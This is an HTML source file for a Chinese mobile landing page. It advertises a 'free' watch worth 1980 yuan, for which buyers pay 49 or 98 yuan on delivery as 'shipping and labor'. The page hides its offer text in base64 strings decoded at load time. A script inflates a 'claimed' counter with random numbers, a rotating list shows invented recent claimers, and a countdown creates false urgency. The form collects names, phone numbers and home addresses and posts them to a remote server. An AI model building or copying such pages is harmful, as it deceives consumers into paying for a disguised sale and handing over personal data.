<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="content-type" content="text/html; charset=UTF-8">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no">
    <meta content="telephone=no" name="format-detection">
    <meta name="apple-touch-fullscreen" content="yes">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">

    <link href="http://7xj94o.com2.z0.glb.qiniucdn.com/buy.css" type="text/css" rel="stylesheet">
    <script src="http://weixin-girl-gift.wedatabank.com/prize/js/jquery.min.js"></script>
    <script src="http://weixin-girl-gift.wedatabank.com/prize/js/core.js"></script>
    <script>
        (function (w) {
            var f = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

            function xd(a) {
                var b = "";
                var c, chr2, chr3;
                var e, enc2, enc3, enc4;
                var i = 0;
                a = a.replace(/[^A-Za-z0-9\+\/\=]/g, "");
                while (i < a.length) {
                    e = f.indexOf(a.charAt(i++));
                    enc2 = f.indexOf(a.charAt(i++));
                    enc3 = f.indexOf(a.charAt(i++));
                    enc4 = f.indexOf(a.charAt(i++));
                    c = (e << 2) | (enc2 >> 4);
                    chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
                    chr3 = ((enc3 & 3) << 6) | enc4;
                    b = b + String.fromCharCode(c);
                    if (enc3 != 64) {
                        b = b + String.fromCharCode(chr2)
                    }
                    if (enc4 != 64) {
                        b = b + String.fromCharCode(chr3)
                    }
                }
                b = _utf8_decode(b);
                return b
            }

            function _utf8_decode(a) {
                var b = "";
                var i = 0;
                var c = c1 = c2 = 0;
                while (i < a.length) {
                    c = a.charCodeAt(i);
                    if (c < 128) {
                        b += String.fromCharCode(c);
                        i++
                    } else if ((c > 191) && (c < 224)) {
                        c2 = a.charCodeAt(i + 1);
                        b += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
                        i += 2
                    } else {
                        c2 = a.charCodeAt(i + 1);
                        c3 = a.charCodeAt(i + 2);
                        b += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
                        i += 3
                    }
                }
                return b
            }

            w.xd = function (s, r) {
                return r ? xd(s) : xd(s)
            }
        })(window);
    </script>
    <script type="text/javascript">document.write(xd('PHRpdGxlPuiuouWNleS/oeaBrzwvdGl0bGU+'))</script>
    <script language="javascript">
        function check_tel(obj) {

            var objvalue = obj.value;

            var regx = /^(?:13\d|15\d|18[123456789])-?\d{5}(\d{3}|\*{3})$/;

            if (regx.test(objvalue)) {

                return 1;

            } else {

                return 0;

            }

        }
    </script>
    <style type="text/css">
        .loading-indicator {
            height: 80px;
            width: 80px;
            background-repeat: no-repeat;
            background-position: center center;
        }

        .loading-indicator-overlay {
            background-color: #FFFFFF;
            opacity: 0.6;
            filter: alpha(opacity=60);
        }

        .data-list {
            overflow: hidden;
        }

        .hide {
            height: 0;
            overflow: hidden;;
        }

        .data-list li {
            float: left;
            margin-bottom: 20px;
            margin-right: 10px
        }

        .data-list li a {
            line-height: 30px;
            border: 1px solid #ceced0;
            background-color: #fafafa;
            border-radius: 5px;
            padding: 0 15px;
            display: inline-block;
        }

        .data-list li a.active {
            border: 1px solid red;
        }

        .spinner {
            margin: 100px auto;
            width: 30px;
            height: 30px;
            position: relative;
        }

        .container1 > div, .container2 > div, .container3 > div {
            width: 6px;
            height: 6px;
            background-color: #333;

            border-radius: 100%;
            position: absolute;
            -webkit-animation: bouncedelay 1.2s infinite ease-in-out;
            animation: bouncedelay 1.2s infinite ease-in-out;
            -webkit-animation-fill-mode: both;
            animation-fill-mode: both;
        }

        .spinner .spinner-container {
            position: absolute;
            width: 100%;
            height: 100%;
        }

        .container2 {
            -webkit-transform: rotateZ(45deg);
            transform: rotateZ(45deg);
        }

        .container3 {
            -webkit-transform: rotateZ(90deg);
            transform: rotateZ(90deg);
        }

        .circle1 {
            top: 0;
            left: 0;
        }

        .circle2 {
            top: 0;
            right: 0;
        }

        .circle3 {
            right: 0;
            bottom: 0;
        }

        .circle4 {
            left: 0;
            bottom: 0;
        }

        .container2 .circle1 {
            -webkit-animation-delay: -1.1s;
            animation-delay: -1.1s;
        }

        .container3 .circle1 {
            -webkit-animation-delay: -1.0s;
            animation-delay: -1.0s;
        }

        .container1 .circle2 {
            -webkit-animation-delay: -0.9s;
            animation-delay: -0.9s;
        }

        .container2 .circle2 {
            -webkit-animation-delay: -0.8s;
            animation-delay: -0.8s;
        }

        .container3 .circle2 {
            -webkit-animation-delay: -0.7s;
            animation-delay: -0.7s;
        }

        .container1 .circle3 {
            -webkit-animation-delay: -0.6s;
            animation-delay: -0.6s;
        }

        .container2 .circle3 {
            -webkit-animation-delay: -0.5s;
            animation-delay: -0.5s;
        }

        .container3 .circle3 {
            -webkit-animation-delay: -0.4s;
            animation-delay: -0.4s;
        }

        .container1 .circle4 {
            -webkit-animation-delay: -0.3s;
            animation-delay: -0.3s;
        }

        .container2 .circle4 {
            -webkit-animation-delay: -0.2s;
            animation-delay: -0.2s;
        }

        .container3 .circle4 {
            -webkit-animation-delay: -0.1s;
            animation-delay: -0.1s;
        }

        @-webkit-keyframes bouncedelay {
            0%, 80%, 100% {
                -webkit-transform: scale(0.0)
            }
            40% {
                -webkit-transform: scale(1.0)
            }
        }

        @keyframes bouncedelay {
            0%, 80%, 100% {
                transform: scale(0.0);
                -webkit-transform: scale(0.0);
            }
            40% {
                transform: scale(1.0);
                -webkit-transform: scale(1.0);
            }
        }

        .fr {
            float: right;
        }

        .fl {
            float: left;
        }

        .cl {
            clear: both;
        }

        .on {

            z-index: 200;
            height: 45px;
            line-height: 45px;
            background: #fff none repeat scroll 0% 0%;
            border-bottom: 1px solid #ccc;
        }

        .on .dh {
            padding-left: 10px;
        }

        .on .qg a {
            text-decoration: none;
            border: 1px solid #ff5000;
            border-radius: 5px;
            color: #fff;
            background: #ff5000 none repeat scroll 0% 0%;
            display: block;
            font-size: 0.875em;
            height: 30px;
            line-height: 30px;
            margin: 6px 6px 6px 40px;
            text-align: center;
            width: 70px;
        }

        .ytytrygfghf_tip {
            overflow: hidden;
            border-bottom: #fff 1px solid;
        }

        .ytytrygfghf_tip dd {
            background: #e60000;
            padding: 10px 10px;
            color: #fff;
            text-align: center;
            margin: 0;
        }

        .ytytrygfghf_tip dd .gb_time {
            font-size: 25px;
            color: #ffff00;
            font-weight: bold;
            margin-top: 10px;
        }

        .ytytrygfghf_tip dd .gb_time i {
            background: #fff;
            text-align: center;
            padding: 0 5px;
            color: #000;
            box-shadow: #cecece 2px 2px 3px inset;
            font-style: normal;
            margin: 0 5px;
        }

        .ytytrygfghf_tip a {
            width: 160px;
            height: 30px;
            line-height: 30px;
            color: #000;
            text-align: center;
            display: inline-block;
            background: #ffff00;
            font-weight: bold;
            border-radius: 3px;
            margin-top: 10px;
        }

        .mobile_jilu {
            background: none repeat scroll 0 0 #f5f5f5;
            color: #333333;
            font-size: 12px;
            height: 38px;
            line-height: 18px;
            overflow: hidden;
            padding: 7px;
            margin-top: 5px;
            margin-bottom: 5px;
        }
    </style>
</head>
<body>

<div class="thiswrap">
    <div class="neirongwrap">
        <li><img src="http://img.yzcdn.cn/1467272237310.jpeg" width="100%"></li>
        <section class="ytytrygfghf_tip">
            <dl>
                <dd>
                    <p>3000份好礼领取火热抢订中近一个小时内</p>
                    <p class="gb_time">已有<span id="gb_time" rel="1248"><i>1</i><i>8</i><i>4</i><i>8</i></span>人领取</p>
                </dd>
            </dl>
        </section>
        <li><img src="http://img.yzcdn.cn/upload_files/2016/04/26/FqoyjbQY9BrD_F1dE1VTkZVSM4dO.jpeg" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274414899.jpeg" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/146727442823.jpeg" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274437737.jpeg" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274447531.jpeg" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274457996.jpeg" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274468213.jpeg" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274477887.jpeg" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274494436.jpeg" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274509523.jpeg" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274525399.jpeg" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274545153.jpeg" width="100%"></li>

        <li><img src="http://img.yzcdn.cn/1467274194882.png" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274208434.png" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274219367.png" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/146727423131.png" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274241975.png" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274251631.png" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274263848.png" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/146727427555.png" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274285647.png" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274304276.png" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274316397.png" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274332615.png" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274346456.png" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274357162.png" width="100%"></li>
        <li><img src="http://img.yzcdn.cn/1467274368228.png" width="100%"></li>

    </div>

    <div id="ceng" style="display:none">
        <div class="spinner">
            <div class="spinner-container container1">
                <div class="circle1"></div>
                <div class="circle2"></div>
                <div class="circle3"></div>
                <div class="circle4"></div>
            </div>
            <div class="spinner-container container2">
                <div class="circle1"></div>
                <div class="circle2"></div>
                <div class="circle3"></div>
                <div class="circle4"></div>
            </div>
            <div class="spinner-container container3">
                <div class="circle1"></div>
                <div class="circle2"></div>
                <div class="circle3"></div>
                <div class="circle4"></div>
            </div>
        </div>

        <a style="text-align:center;font-size:18px;margin-left:10%">正在为您下单领取中...请稍等</a>
    </div>
    <div id="neirong">
        <form id="form_buy" action="" method="post" target="_parent">
            <section class="item_sec">
                <div class="item_wrap rel">
                    <ul>
                        <li style=""><img src="http://7xl26d.com2.z0.glb.qiniucdn.com/da56e305e06d25ca.jpg"
                                          width="100%"></li>
                        <li style="margin:15px 0px 15px 0px;" class="i_pri"><b>
                            <script type="text/javascript">document.write(xd('44CQ5YWNLui0uS7pooYu5Y+WLuOAkeaXtuWwmuaDheS+o+iFleihqO+8iOWPjOebmO+8iQ=='))</script>
                        </b><span style="margin-left: 50px;color:#808080">
                        <script type="text/javascript">document.write(xd(''))</script></span></li>
                    </ul>
                    <ul class="data-list" id="shopColorUl">
                    </ul>
                    <ul class="data-list" id="shopSizeUl">
                    </ul>

                    <ul class="sku_ul">
                        <li><a data-jg="49" data-suk="精品双盘—男表" data-fc="16" data-salesNumber="10000000" data-number="1"
                               data-suk="精品双盘—男表" data-buyType="100">精品双盘—男表</a></li>
                        <li><a data-jg="49" data-suk="精品双盘—女表" data-fc="16" data-salesNumber="10000000" data-number="1"
                               data-suk="精品双盘—女表" data-buyType="101">精品双盘—女表</a></li>
                        <li><a data-jg="98" data-suk="精品双盘—情侣对表" data-fc="32" data-salesNumber="10000000"
                               data-number="2" data-suk="精品双盘—情侣对表" data-buyType="102">精品双盘—情侣对表</a></li>
                    </ul>
                    <input type="hidden" name="item_sku_id" id="item_sku_id" value="">

                    <p class="row">
                        <label>
                            <script type="text/javascript">document.write(xd('5Lu344CA5qC8IA=='))</script>
                        </label><input type="hidden" id="item_num" name="num" value="1"/>
                        <span class="i_pri" id="item_price">￥49</span>
                    </p>

                    <script type="text/javascript">document.write(xd('PHAgc3R5bGU9ImNvbG9yOnJlZDtsaW5lLWhlaWdodDogMThweDsiPiDotKfliLDku5jpgq7otLnvvIzkuqflk4Hku7flgLwxOTgw5YWD77yM546w5Zyo5YWN6LS56LWg6YCB77yM5Y+q6ZyA6Ieq5ouf5b+r6YCS6LS55Y+K5Lq65bel6LS577yM5Yiw5LuYPHNwYW4gY2xhc3M9J3BySmcnPjw/PSAkamdbMV07ID8+PC9zcGFuPuWFg++8jOeUseW/q+mAkuWFrOWPuOaUtuWPluOAgjwvcD4='))</script>
                </div>
            </section>

            <section class="item_sec" name="dinggou">
                <div class="item_wrap add">
                    <p class="row">
                        <label for="name">收货人</label>
                        <input required="required" id="name" name="name" class="block input" tabindex="1" type="text" value="" placeholder="收货人"/>
                    </p>

                    <p class="row">
                        <label for="tel">联系手机</label>
                        <input required="required" id="tel" name="tel" maxlength="11" onkeyup="(this.v=function(){this.value=this.value.replace(/[^0-9-]+/,'');}).call(this)" onblur="this.v();" class="block input" tabindex="2" type="tel" value="" placeholder="联系手机"/>
                    </p>

                    <p class="row">
                        <label for="province">选择地区</label>
                        <select class="select" id="province" name="province" tabindex="3">
                            <option value="0">请选择省</option>
                            <option value="2">北京</option>
                            <option value="3">安徽</option>
                            <option value="4">福建</option>
                            <option value="5">甘肃</option>
                            <option value="6">广东</option>
                            <option value="7">广西</option>
                            <option value="8">贵州</option>
                            <option value="9">海南</option>
                            <option value="10">河北</option>
                            <option value="11">河南</option>
                            <option value="12">黑龙江</option>
                            <option value="13">湖北</option>
                            <option value="14">湖南</option>
                            <option value="15">吉林</option>
                            <option value="16">江苏</option>
                            <option value="17">江西</option>
                            <option value="18">辽宁</option>
                            <option value="19">内蒙古</option>
                            <option value="20">宁夏</option>
                            <option value="21">青海</option>
                            <option value="22">山东</option>
                            <option value="23">山西</option>
                            <option value="24">陕西</option>
                            <option value="25">上海</option>
                            <option value="26">四川</option>
                            <option value="27">天津</option>
                            <option value="28">西藏</option>
                            <option value="29">新疆</option>
                            <option value="30">云南</option>
                            <option value="31">浙江</option>
                            <option value="32">重庆</option>
                            <option value="33">香港</option>
                            <option value="34">澳门</option>
                            <option value="35">台湾</option>
                        </select>
                        <select class="select" id="city" name="city" tabindex="4">
                            <option value="0">请选择市</option>
                        </select>
                        <select class="select" id="area" name="area" tabindex="5">
                            <option value="0">请选择地区</option>
                        </select>
                    </p>

                    <p class="row row_area">
                        <label for="address">详细地址</label>
                        <input required="required" id="address" name="xdz" class="block input" placeholder="街道门牌信息" tabindex="6" type="text" value="" />
                    </p>
                </div>
                <div class="ti">
                    <div class="ti-title">活动说明<span style="color: red;">*</span></div>
                    <div style="line-height: 22px;">
                        因活动发货量巨大，本活动发货环节已统一外包给申通快递公司负责（包括仓储，包装盒，打包，配送快递）本活动需自行向快递公司支付到付快递费及人工费合计<span
                            class="prJg"><?= 49; ?></span>元，由快递公司收取，货到后在付款给快递员！
                    </div>
                    <div style="border: 1px solid #c5c5c5;  padding:5px 0 5px 20px;;">
                        <input type="radio" value="5QJ3" name="entry[field_10]" checked="checked">
                        我已阅读并同意以上活动说明
                    </div>
                </div>
            </section>

            <footer>
                <img src="http://7xl26d.com2.z0.glb.qiniucdn.com/TB2f9ngfXXXXXX0XXXXXXXXXXXX_!!614954639.png"
                     style="width: 100%;margin-bottom: 10px;" alt="安全认证提示">
                <button type="button" class="c_txt orange_bg" id="buy_now">提 交</button>
                <p style="padding: 13px 10px; line-height: 30px;">
                    <script type="text/javascript">document.write(xd('5rOo77ya5o+Q5Lqk6K6i5Y2V5ZCO77yM5aaC6aKG5Y+W5oiQ5Yqf77yM5bCG5Lya5Lul55+t5L+h5pa55byP5Y+R6YCB6Iez5oKo5omL5py677yM5o+Q56S66aKG5Y+W5oiQ5Yqf77yM6K+35rOo5oSP55+t5L+h5Zue5aSN77yB'))</script>
                </p>
            </footer>
        </form>
    </div>
    <div class="on" style="position:fixed; bottom:0; left:0;right:0; width:100%;max-width:640px;">
        <div class="dh fl" style="color: #555;">
            活动剩余时间：<span id="divdown2" style="color: #ff5000;"></span>
        </div>
        <div id="f_btn_box" class="qg fr">
            <a id="f_btn" class="toorder" href="#dinggou">马上领取</a></div>
        <div class="cl"></div>

    </div>
    <div class="mobile_jilu" id="demo" style="margin:0 auto;"></div>
    <div style="height:50px"></div>
</div>
<script type="text/javascript" src="http://o7vycr6w9.bkt.clouddn.com/jquery.showLoading.min.js"></script>
<script type="text/javascript">

    $(function () {
        var $random = parseInt(Math.random() * (1000 - 0) + 1000);
        var $random2 = parseInt(Math.random() * (20 - 1));

        function times() {
            var $obj = $('#gb_time').attr('rel');
            $random += $random2;
            var $obj = $random;
            $('#gb_time').attr('rel', $obj);
            var $objplit = String($obj).split('');
            var $objhtml = '';
            for (var i = 0; i < $objplit.length; i++) {
                $objhtml += '<i>' + $objplit[i] + '</i>';
            }
            $('#gb_time').html($objhtml)
            setTimeout(times, 2000);
        }

        times();
    });

    var interval = 1000;
    function ShowCountDown(year, month, day, divname) {
        var now = new Date();
        var endDate = new Date(year, month - 1, day);
        var leftTime = endDate.getTime() - now.getTime();
        var leftsecond = parseInt(leftTime / 1000);
        var day1 = Math.floor(leftsecond / (60 * 60 * 24));
        var hour = Math.floor((leftsecond - day1 * 24 * 60 * 60) / 3600);
        var minute = Math.floor((leftsecond - day1 * 24 * 60 * 60 - hour * 3600) / 60);
        var second = Math.floor(leftsecond - day1 * 24 * 60 * 60 - hour * 3600 - minute * 60);
        var cc = document.getElementById(divname);
        cc.innerHTML = minute + "分" + second + "秒";
    }
    window.setInterval(function () {
        ShowCountDown(2015, 10, 20, 'divdown2');
    }, interval);

    var marquee = new Array(
            "[最新]：131****9140在1分钟前成功申请了 精英男款高档腕表<br />",
            "[最新]：134****3463在2分钟前成功申请了 时尚女款精品腕表<br />",
            "[最新]：159****2467在4分钟前成功申请了 精英男款高档腕表<br />",
            "[最新]：138****4936在5分钟前成功申请了 精英男款高档腕表<br />",
            "[最新]：186****0436在7分钟前成功申请了 精英男款高档腕表<br />",
            "[最新]：134****1706在9分钟前成功申请了 时尚女款精品腕表<br />",
            "[最新]：133****7555在10分钟前成功申请了 精英男款高档腕表<br />",
            "[最新]：188****4674在12分钟前成功申请了 时尚女款精品腕表<br />");
    var marqeeI = 0;
    var marqueeII = 1;
    function marqueeL() {
        if (marqeeI > (marquee.length - 1))
            marqeeI = 0;
        if (marqueeII > (marquee.length - 1))
            marqeeI = 0;
        marqueeII = marqeeI + 1;
        var marHTML = marquee[marqeeI] + marquee[marqueeII];
        document.getElementById("demo").innerHTML = marHTML;
        marqeeI += 1;
        marqueeII += 1;
    }
    window.setInterval(function () {
        marqueeL()
    }, 2000);

    var Item = {
        getItemInfo: function () {

        },
        changeCount: function () {

        },
        init: function () {

            $("#buy_now").bind("click", function () {

                var name = $("#name").val();
                var tel = $("#tel").val();
                var rid = $("#rid").val();
                var address = $("#address").val();

                var pro = parseInt($('#province').find('option:selected').attr('value'));
                var city = parseInt($('#city').find('option:selected').attr('value'));
                var area = parseInt($('#area').find('option:selected').attr('value'));

                var $sku_cur = $('.sku_cur');
                if ($sku_cur.length == 0) {
                    alert('请选择手表类型');
                    return;
                }

                var number = $sku_cur.attr('data-number');
                var buyType = $sku_cur.attr('data-buyType');

                if (name == '') {
                    alert('收货人不可为空');
                    return;
                } else if (tel == '') {
                    alert("电话不可为空");
                    return;
                } else if (tel.length != 11) {
                    alert('电话填写不正确');
                    return;
                } else if (!pro || !city || !area) {
                    alert('请选择收获地区');
                    return;
                } else if (address == '') {
                    alert('详细地址不可为空');
                    return;
                } else {
                    $(this).attr("disabled", "disabled");
                    $("#neirong").css("display", "none");
                    $("#ceng").css("display", "block");

                    $.ajax({
                        type: 'POST',
                        dataType: "json",
                        // jsonp: "callback",
                        // contentType: 'application/json',
                        url: 'http://wshop.wedatabank.com/wap/flow.php',
                        crossDomain: true,
                        data: {
                            goods_id: 13,
                            spec_1: 28,
                            shipping_id: 1,
                            pay_id: 1,
                            step: 'done',
                            host: 'http://' + location.host,
                            number: number,   // 男表、女表：1  情侣表：2
                            spec_4: buyType, // 男表：100 女表：101 情侣表：102
                            name: name,
                            tel: tel,
                            province: pro,
                            city: city,
                            district: area,
                            address: address
                        },
                        success: function (data) {

                            if (data.success == 1) {
                                window.location.href = "add.html";
                            }

                        },
                        error: function (data) {

                        }
                    });

                    _czc.push(["_trackEvent", g_appkey, '购买手表']);

                }
            });
        }
    }

    function sex(data) {
        var x = data.static;
        alert(x);
    }

    $(".sku_ul a").bind("click", function () {//尺码点击
        var o = $(this);
        if (!o.hasClass("sku_cur")) {//点击的不是当前已经选中的
            $(".sku_cur").removeClass("sku_cur");
            o.addClass("sku_cur");
            /*更新对应的选中尺码的数据*/
            $("#item_price").html("￥" + o.attr("data-jg"));
            $("#item_num").val(o.attr("data-jg"));
            $("#suk").val(o.attr("data-suk"));
            $("#fc").val(o.attr("data-fc"));
            $("#jg").val(o.attr("data-jg"));
            $(".prJg").text(o.attr("data-jg"));
            $("#salesNumber").val(o.attr("data-salesNumber"));
        }
    });

    $(function () {
        $(".data-list li a").click(function () {
            var $this = $(this);
            $this.parents(".data-list").find("a").removeClass('active');
            $this.addClass('active');
        })
        $("#shopColorUl li a").click(function () {
            var $this = $(this);
            $("#shopcolor").val($this.attr("data"));
        });
        $("#shopSizeUl li a").click(function () {
            var $this = $(this);
            $("#shopsize").val($this.attr("data"));
        });
        // $(".data-list li a:eq(0)").click();
        $(".data-list").find("a:first").click();
        $(".sku_ul li a:first").click();
    });

    Item.init();

    $(function () {

//        alert(JSON.stringify($('body').on));

        $('#province').change(function () {

            var $item = $(this).find('option:selected');

            var value = parseInt($item.attr('value'));

            if(value){
                $.ajax({
                    type: 'GET',
                    dataType: "json",
                    url: 'http://wshop.wedatabank.com/region.php',
                    crossDomain: true,
                    data: {
                        type: 2,
                        target: 'selCities_0',
                        parent: value,
                        host: 'http://'+ location.host
                    },
                    success: function(data){

                        var html = [];
                        html.push('<option value="0">请选择市</option>');
                        $(data.regions).each(function (index, item) {
                            html.push('<option value="'+item.region_id+'">'+ item.region_name +'</option>');
                        });
                        $('#city').html(html.join(''));
                        $('#area').html('<option value="0">请选择地区</option>');

                    },
                    error: function () {

                    }
                });
            }
        });

        $('#city').change(function () {
            var $item = $(this).find('option:selected');
            var value = parseInt($item.attr('value'));

            if(value){
                $.ajax({
                    type: 'GET',
                    dataType: "json",
                    url: 'http://wshop.wedatabank.com/region.php',
                    crossDomain: true,
                    data: {
                        type: 3,
                        target: 'selDistricts_0',
                        parent: value,
                        host: 'http://'+ location.host
                    },
                    success: function(data){

                        var html = [];
                        html.push('<option value="0">请选择地区</option>');
                        $(data.regions).each(function (index, item) {
                            html.push('<option value="'+item.region_id+'">'+ item.region_name +'</option>');
                        });
                        $('#area').html(html.join(''));
                    },
                    error: function () {

                    }
                });
            }
        });

    });

//    $(function () {
//        _czc.push(["_trackEvent", 'pv'+ g_appkey, 'result.html']);
//    });
</script>
</body>
</html>
